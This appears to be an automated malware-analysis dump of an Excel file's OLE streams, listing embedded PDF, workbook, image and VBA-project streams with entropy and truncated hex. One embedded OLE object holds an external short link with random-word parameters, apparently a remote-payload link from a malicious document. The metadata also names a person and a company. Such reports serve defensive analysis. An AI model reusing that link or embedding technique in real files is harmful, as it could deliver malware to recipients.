                                                                                                                    Stream Size:244
                                                                                                                    Entropy:2.889430592781307
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:200
                                                                                                                    Entropy:3.2920681057018664
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . ! F K . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090641/\x1CompObj
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:94
                                                                                                                    Entropy:4.345966460061678
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090641/\x1Ole
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:20
                                                                                                                    Entropy:0.5689955935892812
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090641/CONTENTS
                                                                                                                    CLSID:
                                                                                                                    File Type:PDF document, version 1.3, 1 pages
                                                                                                                    Stream Size:29526
                                                                                                                    Entropy:7.810444862277873
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:% P D F - 1 . 3 . % . . 1 0 o b j . < < . / T y p e / P a g e . / M e d i a B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / C r o p B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / P a r e n t 2 0 R . / R o t a t e 0 / R e s o u r c e s < < . / P r o c S e t [ / P D F / I m a g e C / I m a g e B / I m a g e I ] . / X O b j e c t < < . / O b j 3 3 0 R > > . > > . / C o n t e n t s [ 4 0 R ] . > > . e n d o b j . 3 0 o b j . < < / T y p e / X O b
                                                                                                                    Data Raw:25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0d 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 43 72 6f 70 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0a 2f 52 6f 74 61 74 65 20 30 20 2f 52 65 73 6f 75
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/\x1CompObj
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:114
                                                                                                                    Entropy:4.25248375192737
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/\x5DocumentSummaryInformation
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:244
                                                                                                                    Entropy:2.701136490257069
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/\x5SummaryInformation
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:220
                                                                                                                    Entropy:3.372234242231489
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD0018D4CE/\x1Ole
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:20
                                                                                                                    Entropy:0.5689955935892812
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD0018D4CE/\x3ObjInfo
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4
                                                                                                                    Entropy:0.8112781244591328
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . .
                                                                                                                    Data Raw:00 00 03 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD0018D4CE/Contents
                                                                                                                    CLSID:
                                                                                                                    File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                    Stream Size:197671
                                                                                                                    Entropy:6.989042939766534
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD0068D442/\x1CompObj
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:114
                                                                                                                    Entropy:4.219515110876372
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD0068D442/Package
                                                                                                                    CLSID:
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Stream Size:26243
                                                                                                                    Entropy:7.635433729726103
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/\x1CompObj
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:114
                                                                                                                    Entropy:4.25248375192737
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/\x5DocumentSummaryInformation
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:248
                                                                                                                    Entropy:3.0523231150355867
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/\x5SummaryInformation
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:256
                                                                                                                    Entropy:4.086306928392587
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/Workbook
                                                                                                                    CLSID:
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:134792
                                                                                                                    Entropy:7.974168320310173
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                                                                                                                    CLSID:
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Stream Size:468
                                                                                                                    Entropy:5.269289820125323
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                                                                                                                    Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:83
                                                                                                                    Entropy:3.0672749060249043
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                                                                                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:2486
                                                                                                                    Entropy:3.9244127831265385
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:536
                                                                                                                    Entropy:6.330646364694152
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                                                                                                                    Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD00726B69/\x1CompObj
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:114
                                                                                                                    Entropy:4.219515110876372
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/MBD00726B69/Package
                                                                                                                    CLSID:
                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                    Stream Size:26242
                                                                                                                    Entropy:7.635424485665502
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090642/Workbook
                                                                                                                    CLSID:
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:283872
                                                                                                                    Entropy:7.743278150467805
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    General
                                                                                                                    Stream Path:MBD00090643/\x1Ole
                                                                                                                    CLSID:
                                                                                                                    File Type:data
                                                                                                                    Stream Size:962
                                                                                                                    Entropy:5.4674997232154725
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . 6 a l . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . h . o . r . t . . . r . u . k . s . k . . . c . o . m . / . w . A . v . D . W . Q . ? . & . l . e . g . = . f . o . r . t . u . n . a . t . e . & . d . i . s . t . r . i . c . t . = . c . o . h . e . r . e . n . t . & . v . i . b . r . a . p . h . o . n . e . = . s . y . m . p . t . o . m . a . t . i . c . & . r . o . n . a . l . d . = . f . i . n . e . & . k . i . e . l . b . a . s . a . . . ] 5 . . . 1 4 2 &
                                                                                                                    Data Raw:01 00 00 02 d3 e2 ed 36 86 db 61 6c 00 00 00 00 00 00 00 00 00 00 00 00 c6 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c2 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 68 00 6f 00 72 00 74 00 2e 00 72 00 75 00 6b 00 73 00 6b 00 2e 00 63 00 6f 00 6d 00 2f 00 77 00 41 00 76 00 44 00 57 00 51 00 3f 00 26 00 6c 00 65 00 67 00 3d 00 66 00 6f 00 72 00 74 00
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    CLSID:
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:335365
                                                                                                                    Entropy:7.998819840819115
                                                                                                                    Base64 Encoded:True
